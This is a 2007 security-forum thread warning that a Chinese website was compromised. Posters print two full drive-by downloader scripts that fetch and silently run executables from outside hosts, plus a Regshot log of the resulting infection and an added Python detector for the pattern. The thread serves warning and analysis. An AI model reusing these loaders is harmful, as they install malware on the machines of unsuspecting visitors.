Rising Kaka Security Forum, Technical Exchange area, Anti-Virus / Anti-Rogue-Software forum

The "Mishuren" (秘书人) website is carrying a virus, everyone be careful when visiting!

Rising warns that the "Mishuren" (秘书人) website (http://www.mishuren.com/) is carrying a virus. Everyone take note!

[Attached image, uploaded 2007-1-25 16:15:06]

Last edited 2007-01-25 18:09:44

Going to take a look, hahaha

<script language='JavaScript' type='text/JavaScript' src='/js/menu.js'></script>

It's been injected.. it's probably the ad that got injected..

<html>

<head>

<script language="VBScript">

function rechange(k)

s=Split(k,",")

t=""

For i = 0 To UBound(s)

t=t+Chr(eval(s(i)))

Next

rechange=t

End Function

t="on error resume next
download = "http://msexe.3322.org/flash.exe"
Set Non1 = document.createElement("object")
FuckingID = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Non1.setAttribute "classid", FuckingID
NonStr="Microsoft.XMLHTTP"
Set Non = Non1.CreateObject(NonStr,"")
NonStr1="Ado"
NonStr2="db."
NonStr3="Str"
NonStr4="eam"
NonStr5=NonStr1&NonStr2&NonStr3&NonStr4
NonStr6=NonStr5
set SSSS = Non1.createobject(NonStr6,"")
SSSS.type = 1
NonStr7="GET"
Non.Open NonStr7, download, False
Non.Send
filename="Wolvez.Com"
set Fso = Non1.createobject("Scripting.FileSystemObject","")
set tmp = Fso.GetSpecialFolder(2)
filename= Fso.BuildPath(tmp,filename)
SSSS.open
SSSS.write Non.responseBody
SSSS.savetofile filename,2
SSSS.close
set Exe = Non1.createobject("Shell.Application","")
Exe.ShellExecute filename,"","","open",0"

i=t

execute(rechange(I))

</script>

</head>

</html>

Hmm, which ad is it? I went and played with it in a virtual machine, and it even includes Viking (威金), it seems. I'm in trouble!!!!!!!!!!

Only one thing was injected.. it looks like a downloader..

The Zhongtian forum has a problem too

[Attached image, uploaded 2007-1-25 16:33:32]

Only one?? M, look more carefully


function gn(n) { var number = Math.random()*n; return 'svchost'+'.exe'; } try { dl='http://www2.89111.cn/system.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }


It downloads 'http://www2.89111.cn/system.exe', which is a Viking
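Both scripts posted above create an `<object>` with the same class ID and use it to instantiate an HTTP client, a binary stream and a shell object, with the ProgID strings split across concatenations. The following is an added example, not code from any poster in this thread, of a static check that rebuilds those strings and flags the combination; the sample inputs are constructed, non-functional fragments with a placeholder URL, and the function names are chosen here.

```python
import re

# Class ID both scripts in this thread set on an <object> (the RDS.DataSpace control).
OBJECT_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
# ProgIDs the scripts instantiate through it, mapped to what each one is used for.
PROGIDS = {
    "microsoft.xmlhttp": "http-download",
    "adodb.stream": "binary-file-write",
    "shell.application": "process-launch",
}
STR = r'"[^"]*"|\'[^\']*\''
CONCAT = re.compile(rf'({STR})\s*[&+]\s*({STR})')
ASSIGN = re.compile(r'\s*(?:var\s+|set\s+)?(\w+)\s*=\s*(.+)$', re.I)

def fold_literals(text):
    """Join adjacent string literals until nothing changes: "Ado"&"db." -> "Adodb."."""
    prev = None
    while prev != text:
        prev = text
        text = CONCAT.sub(lambda m: '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"', text)
    return text

def resolve_strings(script):
    """Collect every string the script spells out, following name = a & b & c chains."""
    known, values = {}, set()
    for stmt in re.split(r'[;\n]', script):
        values.update(lit[1:-1] for lit in re.findall(STR, stmt))
        m = ASSIGN.match(stmt)
        if not m:
            continue
        pieces = []
        for part in re.split(r'[&+]', m.group(2)):
            part = part.strip()
            if re.fullmatch(STR, part):
                pieces.append(part[1:-1])
            elif part.lower() in known:
                pieces.append(known[part.lower()])
            else:
                break  # right-hand side is not a pure string expression
        else:
            known[m.group(1).lower()] = "".join(pieces)
            values.add("".join(pieces))
    return values

def assess(script):
    """Flag a page script that pairs the class ID with download, write and launch objects."""
    values = {v.lower() for v in resolve_strings(fold_literals(script))}
    has_clsid = any(OBJECT_CLSID in v for v in values)
    caps = sorted({cap for pid, cap in PROGIDS.items() if pid in values})
    return {"clsid": has_clsid, "capabilities": caps,
            "drive_by_downloader": has_clsid and len(caps) == len(PROGIDS)}

# Constructed samples: object creation only, placeholder URL, no download or launch calls.
SAMPLE_VBS = '''
u = "http://downloads.example.invalid/a.exe"
Set o = document.createElement("object")
o.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set h = o.CreateObject("Microsoft.XMLHTTP","")
p1="Ado"
p2="db."
p3="Str"
p4="eam"
p5=p1&p2&p3&p4
Set s = o.CreateObject(p5,"")
Set sh = o.CreateObject("Shell.Application","")
'''
SAMPLE_JS = ('var d=document.createElement("object");'
             'd.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");'
             'var x=d.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");'
             'var s=d.CreateObject("Adodb.Stream","");'
             'var q=d.CreateObject("Shell.Application","");')
BENIGN_JS = 'var req = new XMLHttpRequest();\nvar label = "Adodb" + ".Stream";'

if __name__ == "__main__":
    for name, src in (("vbs", SAMPLE_VBS), ("js", SAMPLE_JS), ("benign", BENIGN_JS)):
        print(name, assess(src))
```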

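Quote:
[mopery's post] Only one thing was injected.. it looks like a downloader..
………………

It is a downloader, but it's not that simple; it wrecked my virtual machine......

A new Viking variant. Rising doesn't recognize any of the viruses, haha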

Take a look: below are the registry and file additions and modifications made by this website
REGSHOT  记录文件
个人注释:
日期时间:2007/1/25 08:14:56  ,  2007/1/25 08:15:25
计算机名:UFO-6BDC6C05846 , UFO-6BDC6C05846
用户名称:ufo , ufo

----------------------------------
添加主键:20
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Soft
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Security
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell

----------------------------------
添加键值:61
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ver_down0: "aaasfhauf1a56f4sa5d6ffa1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\load: "C:\WINDOWS\uninstall\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto: "1"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control\ActiveService: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Service: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\DeviceDesc: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Type: 0x00000010
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ErrorControl: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ImagePath: "C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\DisplayName: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ObjectName: "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Description: "为远程计算机注册并更新 IP 地址。"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control\ActiveService: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Service: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\DeviceDesc: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Type: 0x00000010
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ErrorControl: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ImagePath: "C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\DisplayName: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ObjectName: "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Description: "为远程计算机注册并更新 IP 地址。"
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Type: 0x00000001
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Count: 0x00000002
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Time: D7 07 01 00 04 00 19 00 08 00 0F 00 07 00 39 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PrivDiscUiShown: 0x00000001
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1: 14 00 1F 00 80 53 1C 87 A0 42 69 10 A2 EA 08 00 2B 30 30 9D 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\NodeSlot: 0x00000008
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: FF FF FF FF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MinPos800x600(1).x: 0xFFFF8300
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MinPos800x600(1).y: 0xFFFF8300
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MaxPos800x600(1).x: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MaxPos800x600(1).y: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).left: 0x00000016
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).top: 0x0000001D
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).right: 0x0000026E
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).bottom: 0x000001C8
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Rev: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WFlags: 0x00000002
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\ShowCmd: 0x00000003
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\FFlags: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\HotKey: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Buttons: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Links: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Address: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ufo\LOCALS~1\Temp\Wolvez.Com: "Wolvez"
----------------------------------
修改键值:6
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 60 DD 20 5E 1E E7 DB 0B CC DD CF 44 1B 72 16 C1 10 E3 FC AB 55 5B D8 9D A9 99 A4 55 2E DA 93 1C 68 CE 76 2A B7 5A EF E8 8F EA 1E 28 DB F3 DC 0D E4 F7 0A 64 A2 A4 35 8F F7 9E 2F 7C C2 84 64 73 0C 84 71 2C 4F 62 E6 06 17 92 3F 83 BC 04 C8 5E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 26 B3 C4 4E 5D 82 EA EB 5A 1B 9D 11 68 C4 E6 26 AC 53 54 9E C6 32 47 AC 03 FA 22 0B 29 D1 90 04 8A B8 4C CB 8B 5E 90 22 E6 26 77 B9 60 83 42 94 00 2A 9F 33 3F 3F 29 7A 12 BD 81 D8 65 F5 3E CB 3D C1 47 22 3B 1D 65 B2 53 4B E8 0F 85 2B BA 04
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name: "msoobe.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name: "iexplore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID: 0x3B7D853E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID: 0x41107B81
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 FF FF FF FF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF

----------------------------------
添加文件:75
----------------------------------
C:\Documents and Settings\ufo\Cookies\ufo@www.mishuren[2].txt
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Documents and Settings\ufo\Local Settings\Temp\Wolvez.Com
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\20060405145810144[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\459367da7b473[1].jpg
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\459368b78c5ec[1].jpg
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\bg_all[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\CAYVQ3YL.htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\code[1].php
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\index_01[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\left_tdbg1[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\main_announce[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\qq[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\ShowClass_Menu[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\ShowSpecialList[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\system[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\tongji[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\voteView[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\1[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\405[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\a1[1].txt
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\a2[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\beijing888[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\click[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\cool[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\hengjiange[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\icon_0[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\index_02[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\left_tdbg2[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\main_title_575[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\newguest[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\sa[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\stm31[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\528438[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\a1[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\announce[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\article_common[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\blank[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\code[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\dbtl1[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\DefaultSkin[1].css
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\index_03[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\jiange888[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\mishuren[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\nologo[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\qq1[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\s[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\UserLogin[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\voteSubmit[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\a2[1].txt
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\ad[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\arrow3[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\arrow_r[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\article_elite[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\dbtl[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\flash[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\google[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\icon2[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\left_title[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\menu[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\Soft_common[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\stat[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\tvlm[1].css
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\wzclick[1].htm
C:\Program Files\Internet Explorer\SMSS.EXE
C:\Program Files\Internet Explorer\SVCHOST.EXE
C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf
C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf
C:\WINDOWS\Prefetch\SMSS.EXE-11FFFDBB.pf
C:\WINDOWS\Prefetch\SVCHOST.EXE-16C7D411.pf
C:\WINDOWS\Prefetch\WOLVEZ.COM-3983CE74.pf
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\RichDll.dll
C:\WINDOWS\svchost.exe
C:\WINDOWS\uninstall\rundl132.exe

----------------------------------
修改文件:15
----------------------------------
C:\Documents and Settings\ufo\Cookies\index.dat
